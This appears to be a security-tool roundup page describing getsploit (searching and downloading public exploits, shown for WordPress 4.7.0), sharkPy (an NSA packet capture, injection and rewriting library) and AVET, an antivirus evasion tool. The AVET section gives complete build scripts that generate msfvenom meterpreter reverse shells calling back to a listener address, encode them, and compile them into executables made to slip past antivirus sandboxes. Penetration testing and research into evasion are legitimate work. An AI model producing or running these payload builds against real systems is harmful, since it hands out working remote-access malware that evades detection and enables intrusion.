getsploit - Command line utility for searching and downloading exploits

Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.

Python version
Utility was tested on a python2.6, python2.7, python3.6. If you found any bugs, don't hesitate to open issue

How to use

Search

# git clone https://github.com/vulnersCom/getsploit
# cd getsploit
# ./getsploit.py wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

Save exploit files

# ./getsploit.py -m wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

# ls
LICENSE         README.md       getsploit.py    wordpress-470
# cd wordpress-470
# ls
edb-id41223.txt         edb-id41224.txt         edb-id41308.txt         packetstorm140893.txt   packetstorm140901.txt   packetstorm140902.txt   packetstorm141039.txt   ssv-92637.txt

Local database
If your Python supports sqlite3 lib(builtin) you can use --update and --local commands to download whole exploit database to your PC. After update you can perform local offline searches.

# ./getsploit.py --update
Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
219642496/219642496 [100.00%]
Unpacking database.
Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'

Download getsploit

Read More

sharkPy - NSA Tool to Dissect, Analyze, and Interact with Network Packet Data using Wireshark and libpcap capabilities

A python module to dissect, analyze, and interact with network packet data as native Python objects using Wireshark and libpcap capabilities. sharkPy dissect modules extend and otherwise modify Wireshark's tshark. SharkPy packet injection and pcap file writing modules wrap useful libpcap functionality.

SharkPy comes with six modules that allows one to explore, create, and/or modify packet data and (re)send data over network, and write (possibly modified) packets to a new pcap output file. This is all done within python program or interactive python session.

1. sharkPy.file_dissector -- dissect capture file packets using Wireshark's dissection libraries and present detailed packet dissections to caller as native Python objects.
   
2. sharkPy.wire_dissector -- capture packets from interface and dissect captured packets using Wireshark's dissection libraries. Presents packets to callers as native Python objects.
   
3. sharkPy.file_writer -- write (possibly modified) packets to a new output pcap file. For example, one can dissect packet capture file using sharkPy.file_dissector, create new packets based on the packets in the dissected file, and then write new/modified packets to an output pcap file.
   
4. sharkPy.wire_writer -- write arbitrary data (e.g. modified packets) to specified network interface using libpcap functionality. Currently, sharkPy users are responsible for correctly building packets that are transmitted using this module's functionality.
   
5. sharkPy.utils -- a set of utility functions
   
6. sharkPy.protocol_blender -- protocol specific convenience functions. Currently contains functions for ipv4 and tcp over ipv4.
   

SharkPy is provided "as-is" with NO WARRANTIES expressed or implied under GPLv2. Use at your own risk.

Design Goals

1. Deliver dissected packet data to callers as native python objects.
   
2. Provide functionality within a Python environment, either a python program or interactive python session.
   
3. Make commands non-blocking whenever reasonable providing command results to caller on-demand.
   
4. Be easy to understand and use assuming one understands Wireshark and python basics.
   
5. Pack functionality into a small number of commands.
   
6. Build and install as little C-code as possible by linking to preexisting Wireshark shared libs.
   

Why sharkPy?
SharkPy has a long-term goal of segmenting Wireshark's incredible diversity of capabilities into a set of shared libraries that are smaller, more modular, more easily compiled and linked into other projects. This goal seperates sharkPy from other similar efforts that endeavor to marry Wireshark/tshark and Python.
The first step is provide Wireshark/tshark capabilities as Python modules that can be compiled/linked outside of Wireshark's normal build process. This has been achieved at least for some linux environments/distros. Next step is to expand to a broader range of linux distros and Windows improving stability along the way. Once this is completed and sharkPy's capabilities are similar to those provided by tshark, the sharkPy project devs will start the process of segmenting the code base as described above.

HOW-TO

VM INSTALL

Should install/run on most linux distros as long as Wireshark version 2.0.1 or newer is installed and the following steps (or equivalent) are successful.

## ubuntu-16.04-desktop-amd64 -- clean install
sudo apt-get git
git clone https://github.com/NationalSecurityAgency/sharkPy
sudo apt-get install libpcap-dev
sudo apt-get install libglib2.0-dev
sudo apt-get install libpython-dev
sudo apt-get install wireshark-dev       #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
sudo apt-get install wireshark           #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
cd sharkPy
sudo ./setup install

DOCKER

Set up
First, make sharkPy directory and place Dockerfile into it. cd into this new directory.<br/>

Build sharkPy Docker image

docker build -t "ubuntu16_04:sharkPy" .

Notes:

• build will take a while and should be completely automated.
• sharkPy dist code will be in /sharkPy
• build creates Ubuntu 16.04 image and installs sharkPy as a Python module

Run interactively as Docker container.
Should give you command prompt

docker run -it ubuntu16_04:sharkPy /bin/bash

Command prompt and access to host NICs (to allow for network capture)

docker run -it --net=host ubuntu16_04:sharkPy /bin/bash

sharkPy API

Dissecting packets from file

dissect_file(file_path, options=[], timeout=10): collect packets from packet capture file delivering packet dissections when requested using get_next_from_file function.

• name of packet capture file.
• collection and dissection options. Options are disopt.DECODE_AS and disopt.NAME_RESOLUTION.
• timeout: amount of time (in seconds) to wait before file open fails.
• RETURNS tuple (p, exit_event, shared_pipe):
  • p: dissection process handle.
  • exit_event: event handler used to signal that collection should stop.
  • shared_pipe: shared pipe that dissector returns dissection trees into.
  • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_file and close_file functions as input param.

get_next_from_file(dissect_process,timeout=None): get next available packet dissection.

• dissect_process: tuple returned from the dissect_file function.
• timeout: amount to time to wait (in seconds) before operation timesout.
• RETURNS root node of packet dissection tree.

close_file(dissect_process): stop and clean up.

• dissect_process: tuple returned from the dissect_file function.
• RETURNS None.
• NOTE: close_file MUST be called on each session.

Dissecting packets from wire

dissect_wire(interface, options=[], timeout=None): collect packets from interface delivering packet dissections when requested using get_next function.

• name of interface to capture from.
• collection and dissection options. Options are disopt.DECODE_AS, disopt.NAME_RESOLUTION, and disopt.NOT_PROMISCUOUS.
• timeout: amount of time (in seconds) to wait before start capture fails.
• RETURNS tuple (p, exit_event, shared_queue).
  • p: dissection process handle.
  • exit_event: event handler used to signal that collection should stop.
  • shared_queue: shared queue that dissector returns dissection trees into.
  • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_wire and close_wire functions as input param.

get_next_from_wire(dissect_process,timeout=None): get next available packet dissection from live capture.

• dissect_process: tuple returned from the dissect_wire function.
• timeout: amount to time to wait (in seconds) before operation timesout.
• RETURNS root node of packet dissection tree.

close_wire(dissect_process): stop and clean up from live capture.

• dissect_process: tuple returned from the dissect_wire function.
• RETURNS None.
• NOTE: close_wire MUST be called on each capture session.

Writing data/packets on wire or to file

wire_writer(write_interface_list): wire_writer constructor. Used to write arbitrary data to interfaces.

• write_interface_list: list of interface names to write to.
• RETURNS: wire_writer object.
  • wire_writer.cmd: pass a command to writer.
    • wr.cmd(command=wr.WRITE_BYTES, command_data=data_to_write, command_timeout=2)
    • wr.cmd(command=wr.SHUT_DOWN_ALL, command_data=None, command_data=2)
    • wr.cmd(command=wr.SHUT_DOWN_NAMED, command_data=interface_name, command_data=2)
  • wire_writer.get_rst(timeout=1): RETURNS tuple (success/failure, number_of_bytes_written)

file_writer(): Creates a new file_writer object to write packets to an output pcap file.

• make_pcap_error_buffer(): Creates a correctly sized and initialized error buffer.
  • Returns error buffer.
• pcap_write_file(output_file_path, error_buffer): create and open new pcap output file.
  • output_file_path: path for newly created file.
  • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any errors messages will be written to this buffer.
  • RETURNS: ctypes.c_void_p, which is a context object required for other write related functions.
• pcap_write_packet(context, upper_time_val, lower_time_val, num_bytes_to_write, data_to_write, error_buffer): writes packets to opened pcap output file.
  • context: object returned by pcap_write_file().
  • upper_time_val: packet epoch time in seconds. Can be first value in tuple returned from utility function get_pkt_times().
  • lower_time_val: packet epoch time nano seconds remainder. Can be second value in tuple returned from utility function get_pkt_times().
  • num_bytes_to_write: number of bytes to write to file, size of data buffer.
  • data_to_write: buffer of data to write.
  • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any errors messages will be written to this buffer.
  • RETURNS 0 on success, -1 on failure. Error message will be available in err_buffer.
• pcap_close(context): MUST be called to flush write buffer, close write file, and free allocated resources.
  • context: object returned by pcap_write_file().
  • RETURNS: None.

Utility functions

do_funct_walk(root_node, funct, aux=None): recursively pass each node in dissection tree (and aux) to function. Depth first walk.

• root_node: node in dissection tree that will be the first to be passed to function.
• funct: function to call.
• aux: optional auxilliary variable that will be passed in as parameter as part of each function call.
• RETURNS None.

get_node_by_name(root_node, name): finds and returns a list of dissection nodes in dissection tree with a given name (i.e. 'abbrev').

• root_node: root of dissection tree being passed into function.
• name: Name of node used as match key. Matches again 'abbrev' attribute.
• RETURNS: a list of nodes in dissection tree with 'abbrev' attribute that matches name.
• NOTE: 'abbrev' attribute is not necessarily unique in a given dissection tree. This is the reason that this function returns a LIST of matching nodes.

get_node_data_details(node): Returns a tuple of values that describe the data in a given dissection node.

• node: node that will have its details provided.
• RETURNS: tuple (data_len,first_byte_index, last_byte_index, data, binary_data).
  • data_len: number of bytes in node's data.
  • first_byte_index: byte offset from start of packet where this node's data starts.
  • last_byte_index: byte offset from start of packet where this node's data ends.
  • data: string representation of node data.
  • binary_data: binary representation of node data.

get_pkt_times(pkt=input_packet): Returns tuple containing packet timestamp information.

• pkt: packet dissection tree returned from one of sharkPy's dissection routines.
• RETURNS: The tuple (epoch_time_seconds, epoch_time_nanosecond_remainder). These two values are required for file_writer instances.

find_replace_data(pkt, field_name, test_val, replace_with=None, condition_funct=condition_data_equals, enforce_bounds=True, quiet=True): A general search, match, and replace data in packets.

• pkt: packet dissection tree returned from one of sharkPy's dissection routines.
• field_name: the 'abbrev' field name that will have its data modified/replaced.
• test_val: data_val/buffer that will be used for comparison in matching function.
• replace_with: data that will replace the data in matching dissection fields.
• condition_funct: A function that returns True or False and has the prototype condition_funct(node_val, test_val, pkt_dissection_tree). Default is the condition_data_equals() function that returns True if node_val == test_val. This is a literal byte for byte matching.
• enforce_bounds: If set to True, enforces condition that len(replace_with) == len(node_data_to_be_replaced). Good idea to keep this set to its default, which is True.
• quiet: If set to False, will print error message to stdout if the target field 'abbrev' name cannot be found in packet dissection tree.
• RETURNS: new packet data represented as a hex string or None if target field is not in packet.

condition_data_equals(node_val, test_val, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().

• node_val: value from the dissected packet that is being checked
• test_val: value that node_val will be compared to.
• pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
• RETURNS True if a byte for byte comparison reveals that node_val == test_val. Otherwise, returns False.

condition_always_true(node_val=None, test_val=None, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().

• node_val: Not used in this comparison
• test_val: Not used in this comparison
• pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
• RETURNS True ALWAYS. Useful of the only matching criteria is that the target field exists in packet dissection.

Protocol Blender

ipv4_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcaddr=None, new_dstaddr=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select ipv4 fields.

• pkt_dissection: packet dissection tree.
• src_match_value: current source ip address to look for (in hex). This value will be replaced.
• dst_match_value: current destination ip address to look for (in hex). This value will be replaced.
• new_srcaddr: replace current source ip address with this ip address (in hex).
• new_dstaddr: replace current destination ip address with this ip address (in hex).
• update_checksum: fixup ipv4 checksum if True (default).
• condition_funct: matching function used to find correct packets to modify.

tcp_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcport=None, new_dstport=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select fields for tcp over ipv4.

• pkt_dissection: packet dissection tree.
• src_match_value: current source tcp port to look for (in hex). This value will be replaced.
• dst_match_value: current destination tcp port to look for (in hex). This value will be replaced.
• new_srcaddr: replace current source tcp port with this tcp port (in hex).
• new_dstaddr: replace current destination tcp port with this tcp port (in hex).
• update_checksum: fixup tcp checksum if True (default).
• condition_funct: matching function used to find correct packets to modify.

Dissect packets in a capture file

>>> import sharkPy

Supported options so far are DECODE_AS and NAME_RESOLUTION (use option to disable)

>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http')]

Start file read and dissection.

>>> dissection = sharkPy.dissect_file(r'/home/me/capfile.pcap', options=in_options)

Use sharkPy.get_next_from_file to get packet dissections of read packets.

>>> rtn_pkt_dissections_list = []
>>> for cnt in xrange(13):
...     pkt = sharkPy.get_next_from_file(dissection)
...     rtn_pkt_dissections_list.append(pkt)

Node Attributes: 
 abbrev:     frame.
 name:       Frame.
 blurb:      None.
 fvalue:     None.
 level:      0.
 offset:     0.
 ftype:      1.
 ftype_desc: FT_PROTOCOL.
 repr:       Frame 253: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0.
 data:       005056edfe68000c29....<rest edited out>

Number of child nodes: 17
 frame.interface_id
 frame.encap_type
 frame.time
 frame.offset_shift
 frame.time_epoch
 frame.time_delta
 frame.time_delta_displayed
 frame.time_relative
 frame.number
 frame.len
 frame.cap_len
 frame.marked
 frame.ignored
 frame.protocols
 eth
 ip
 tcp

  Node Attributes: 
   abbrev:     frame.interface_id.
   name:       Interface id.
   blurb:      None.
   fvalue:     0.
   level:      1.
   offset:     0.
   ftype:      6.
   ftype_desc: FT_UINT32.
   repr:       Interface id: 0 (eno16777736).
   data:       None.

  Number of child nodes: 0

...<remaining edited out>

Must always close sessions

>>> sharkPy.close_file(dissection)

Take a packet dissection tree and index all nodes by their names (abbrev field)

>>> pkt_dict = {}
>>> sharkPy.collect_proto_ids(rtn_pkt_dissections_list[0], pkt_dict)

Here are all the keys used to index this packet dissection

>>> print pkt_dict.keys()
['tcp.checksum_bad', 'eth.src_resolved', 'tcp.flags.ns', 'ip', 'frame', 'tcp.ack', 'tcp', 'frame.encap_type', 'eth.ig', 'frame.time_relative', 'ip.ttl', 'tcp.checksum_good', 'tcp.stream', 'ip.version', 'tcp.seq', 'ip.dst_host', 'ip.flags.df', 'ip.flags', 'ip.dsfield', 'ip.src_host', 'tcp.len', 'ip.checksum_good', 'tcp.flags.res', 'ip.id', 'ip.flags.mf', 'ip.src', 'ip.checksum', 'eth.src', 'text', 'frame.cap_len', 'ip.hdr_len', 'tcp.flags.cwr', 'tcp.flags', 'tcp.dstport', 'ip.host', 'frame.ignored', 'tcp.window_size', 'eth.dst_resolved', 'tcp.flags.ack', 'frame.time_delta', 'tcp.flags.urg', 'ip.dsfield.ecn', 'eth.addr_resolved', 'eth.lg', 'frame.time_delta_displayed', 'frame.time', 'tcp.flags.str', 'ip.flags.rb', 'tcp.flags.fin', 'ip.dst', 'tcp.flags.reset', 'tcp.flags.ecn', 'tcp.port', 'eth.type', 'ip.checksum_bad', 'tcp.window_size_value', 'ip.addr', 'ip.len', 'frame.time_epoch', 'tcp.hdr_len', 'frame.number', 'ip.dsfield.dscp', 'frame.marked', 'eth.dst', 'tcp.flags.push', 'tcp.srcport', 'tcp.checksum', 'tcp.urgent_pointer', 'eth.addr', 'frame.offset_shift', 'tcp.window_size_scalefactor', 'ip.frag_offset', 'tcp.flags.syn', 'frame.len', 'eth', 'ip.proto', 'frame.protocols', 'frame.interface_id']

Note that pkt_dict entries are lists given that 'abbrevs' are not always unique within a packet.

>>> val_list = pkt_dict['tcp']

Turns out that 'tcp' list has only one element as shown below.

>>> for each in val_list:
...     print each
... 
Node Attributes: 
 abbrev:     tcp.
 name:       Transmission Control Protocol.
 blurb:      None.
 fvalue:     None.
 level:      0.
 offset:     34.
 ftype:      1.
 ftype_desc: FT_PROTOCOL.
 repr:       Transmission Control Protocol, Src Port: 52630 (52630), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 0.
 data:       cd960050df6129ca0d993e7750107d789f870000.

Number of child nodes: 15
 tcp.srcport
 tcp.dstport
 tcp.port
 tcp.port
 tcp.stream
 tcp.len
 tcp.seq
 tcp.ack
 tcp.hdr_len
 tcp.flags
 tcp.window_size_value
 tcp.window_size
 tcp.window_size_scalefactor
 tcp.checksum
 tcp.urgent_pointer

Shortcut for finding a node by name:

>>> val_list = sharkPy.get_node_by_name(rtn_pkt_dissections_list[0], 'ip')

Each node in a packet dissection tree has attributes and a child node list.

>>> pkt = val_list[0]

This is how one accesses attributes

>>> print pkt.attributes.abbrev
tcp

>>> print pkt.attributes.name
Transmission Control Protocol

Here's the pkt's child list

>>> print pkt.children
[<sharkPy.dissect.file_dissector.node object at 0x10fda90>, <sharkPy.dissect.file_dissector.node object at 0x10fdb10>, <sharkPy.dissect.file_dissector.node object at 0x10fdbd0>, <sharkPy.dissect.file_dissector.node object at 0x10fdc90>, <sharkPy.dissect.file_dissector.node object at 0x10fdd50>, <sharkPy.dissect.file_dissector.node object at 0x10fddd0>, <sharkPy.dissect.file_dissector.node object at 0x10fde50>, <sharkPy.dissect.file_dissector.node object at 0x10fded0>, <sharkPy.dissect.file_dissector.node object at 0x10fdf90>, <sharkPy.dissect.file_dissector.node object at 0x1101090>, <sharkPy.dissect.file_dissector.node object at 0x11016d0>, <sharkPy.dissect.file_dissector.node object at 0x11017d0>, <sharkPy.dissect.file_dissector.node object at 0x1101890>, <sharkPy.dissect.file_dissector.node object at 0x1101990>, <sharkPy.dissect.file_dissector.node object at 0x1101b50>]

Get useful information about a dissection node's data

>>> data_len, first_byte_offset, last_byte_offset, data_string_rep, data_binary_rep=sharkPy.get_node_data_details(pkt)

>>> print data_len
54

>>> print first_byte_offset
0

>>> print last_byte_offset
53

>>> print data_string_rep
005056edfe68000c29....<rest edited out>

>>> print binary_string_rep
<prints binary spleg, edited out>

CAPTURE PACKETS FROM NETWORK AND DISSECT THEM

SharkPy wire_dissector provides additional NOT_PROMISCUOUS option

>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http'), (sharkPy.disopt.NOT_PROMISCUOUS, None)]

Start capture and dissection. Note that caller must have appropriate permissions. Running as root could be dangerous!

>>> dissection = sharkPy.dissect_wire(r'eno16777736', options=in_options)
>>> Running as user "root" and group "root". This could be dangerous.

Use sharkPy.get_next_from_wire to get packet dissections of captured packets.

>>> for cnt in xrange(13):
...     pkt=sharkPy.get_next_from_wire(dissection)
...     sharkPy.walk_print(pkt) ## much better idea to save pkts in a list

Must always close capture sessions

>>> sharkPy.close_wire(dissection)

WRITE DATA (packets) TO NETWORK

Create writer object using interface name

>>> wr = sharkPy.wire_writer(['eno16777736'])

Send command to write data to network with timeout of 2 seconds

>>> wr.cmd(wr.WRITE_BYTES,'  djwejkweuraiuhqwerqiorh', 2)

Check for failure. If successful, get return values.

>>> if(not wr.command_failure.is_set()):
...     print wr.get_rst(1)
... 
(0, 26) ### returned success and wrote 26 bytes. ###

WRITE PACKETS TO OUTPUT PCAP FILE

Create file writer object

>>> fw = file_writer()

Create error buffer

>>> errbuf = fw.make_pcap_error_buffer()

Open/create new output pcap file into which packets will be written

>>> outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)

Dissect packets in an existing packet capture file.

>>> sorted_rtn_list = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

Write first packet into output pcap file.

Get first packet dissection

>>> pkt_dissection=sorted_rtn_list[0]

Acquire packet information required for write operation

>>> pkt_frame = sharkPy.get_node_by_name(pkt_dissection, 'frame')
>>> frame_data_length, first_frame_byte_index, last_frame_byte_index, frame_data_as_string, frame_data_as_binary = sharkPy.get_node_data_details(pkt_frame[0])
>>> utime, ltime = sharkPy.get_pkt_times(pkt_dissection)

Write packet into output file

>>> fw.pcap_write_packet(outfile, utime, ltime, frame_data_length, frame_data_as_binary, errbuf)

Close output file and clean-up

>>> fw.pcap_close(outfile)

Match and replace before writing new packets to output pcap file

import sharkPy, binascii

test_value1 = r'0xc0a84f01'
test_value2 = r'c0a84fff'
test_value3 = r'005056c00008'

fw = sharkPy.file_writer()
errbuf = fw.make_pcap_error_buffer()
outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)
sorted_rtn_list = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

for pkt in sorted_rtn_list:

    # do replacement
    new_str_data = sharkPy.find_replace_data(pkt, r'ip.src', test_value1, r'01010101')
    new_str_data = sharkPy.find_replace_data(pkt, r'ip.dst', test_value2, r'02020202')
    new_str_data = sharkPy.find_replace_data(pkt, r'eth.src', test_value3, r'005050505050')

    # get detains required to write to output pcap file
    pkt_frame = sharkPy.get_node_by_name(pkt, 'frame')
    fdl, ffb, flb, fd, fbd = sharkPy.get_node_data_details(pkt_frame[0])
    utime, ltime = sharkPy.get_pkt_times(pkt)

    if(new_str_data is None):
        new_str_data = fd

    newbd = binascii.a2b_hex(new_str_data)
    fw.pcap_write_packet(outfile, utime, ltime, fdl, newbd, errbuf)

fw.pcap_close(outfile)

Download sharkPy

Read More

AVET - AntiVirus Evasion Tool

AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. In version 1.1 lot of stuff was introduced, for a complete overview have a look at the CHANGELOG file. Now 64bit payloads can also be used, for easier usage I hacked a small build tool (avet_fabric.py).

For basics about antivirus evasion have a look at this articles: https://govolutionde.files.wordpress.com/2014/05/avevasion_pentestmag.pdf and my Deepsec presentation: https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf

What & Why:

• when running an exe file made with msfpayload & co, the exe file will often be recognized by the antivirus software
• avet is a antivirus evasion tool targeting windows machines with executable files
• assembly shellcodes can be used
• make_avet can be used for configuring the sourcecode
• with make_avet you can load ASCII encoded shellcodes from a textfile or from a webserver, further it is using an av evasion technique to avoid sandboxing and emulation
• for ASCII encoding the shellcode the tool format.sh and sh_format are included
• this readme applies for Kali 2 (64bit) and tdm-gcc

How to install tdm-gcc with wine: https://govolution.wordpress.com/2017/02/04/using-tdm-gcc-with-kali-2/

How to use make_avet and build scripts
Compile if needed:

$ gcc -o make_avet make_avet.c

The purpose of make_avet is to preconfigure a definition file (defs.h) so that the source code can be compiled in the next step. This way the payload will be encoded as ASCII payload or with encoders from metasploit. You hardly can beat shikata-ga-nai.
Let's have a look at the options from make_avet, examples will be given below: -l load and exec shellcode from given file, call is with mytrojan.exe myshellcode.txt -f compile shellcode into .exe, needs filename of shellcode file -u load and exec shellcode from url using internet explorer (url is compiled into executable) -E use avets ASCII encryption, often do not has to be used Note: with -l -E is mandatory -F use fopen sandbox evasion -X compile for 64 bit -p print debug information -h help
Of course it is possible to run all commands step by step from command line. But it is strongly recommended to use build scripts or the avet_fabric.py.
The build scripts themselves are written so as they have to be called from within the avet directory:

root@kalidan:~/tools/avet# ./build/build_win32_meterpreter_rev_https_20xshikata.sh

Here are some explained examples for building the .exe files from the build directory. Please have a look at the other build scripts for further explanation.

Example 1
Compile shellcode into the .exe file and use -F as evasion technique. Note that this example will work for most antivirus engines. Here -E is used for encoding the shellcode as ASCII.

#!/bin/bash          
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion, -E will encode the shellcode as ASCII
./make_avet -f scclean.txt -F -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h

Example 2
Usage without -E. The ASCII encoder does not have to be used, here is how to compile without -E. In this example the evasion technique is quit simple! The shellcode is encoded with 20 rounds of shikata-ga-nai, often enough that does the trick. This technique is pretty similar to a junk loop. Execute so much code that the AV engine breaks up execution and let the file pass.

#!/bin/bash          
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h

Example 3, 64bit payloads
Great to notice that still for 64bit payload no further evasion techniques has to be used. But -F should work here too.

#!/bin/bash          
# simple example script for building the .exe file
. build/global_win64.sh
# make meterpreter reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile 
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h

Example 4, load from a file
Here the ASCII encoder is needed. The executable will load the payload from a text file, which is enough for most AV engines to let the payload execute.

#!/bin/bash          
# simple example script for building the .exe file that loads the payload from a given text file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > thepayload.txt && rm sc.txt
# call make_avet, the -l compiles the filename into the .exe file 
./make_avet -l thepayload.exe -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
